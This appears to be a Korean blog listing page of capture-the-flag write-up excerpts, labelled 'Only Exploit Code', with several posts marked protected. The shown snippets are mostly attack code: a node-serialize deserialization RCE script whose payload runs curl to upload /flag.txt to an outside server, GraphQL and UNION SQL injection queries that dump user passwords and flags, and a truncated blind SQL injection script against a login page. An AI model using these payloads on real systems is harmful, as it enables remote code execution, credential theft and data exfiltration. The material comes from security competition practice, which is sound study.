Only Exploit Code.. sparta - node-serialize rce # https://www.exploit-db.com/exploits/49552 import requests import re import base64 import sys url = 'http://web.zh3r0.cf:6666/guest' # change this payload = """function(){require('child_process').exec('curl -F file1=@/flag.txt server:1234',function(error, stdout, stderr){return stdout;});}()""" # rce = "_$$ND_FUNC$$_process.exit(0)" # code ="_$$ND..
Team Alpray
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.
1. graphql injection 2. union sql injection get admin password { allUsers{ username password } } login - admin:is_this_visible_to_you? { Challs{ id title description category author points flag{ chall_flag } } } Get Flag using sql injection { hint(chall_id:"-1/**/union/**/select/**/substr(group_concat(chall_flag),256,512),2,3/**/from/**/flags#"){ chall_id } }
1. SQL injection 2. file upload -> rcesql_exploit.py import requests import string import time url = 'http://vkl-sql.darkarmy.xyz/login.php' table_name = '' strings = 'abcdefghijklmnopqrstuvwxyzABCDEFGHJIJKLMNOPQRSTUVWXYZ1234567890{}' for i in range(1,80): for j in strings: #data = {'username':'admin" and if(ascii(substr((select schema_name from information_sc..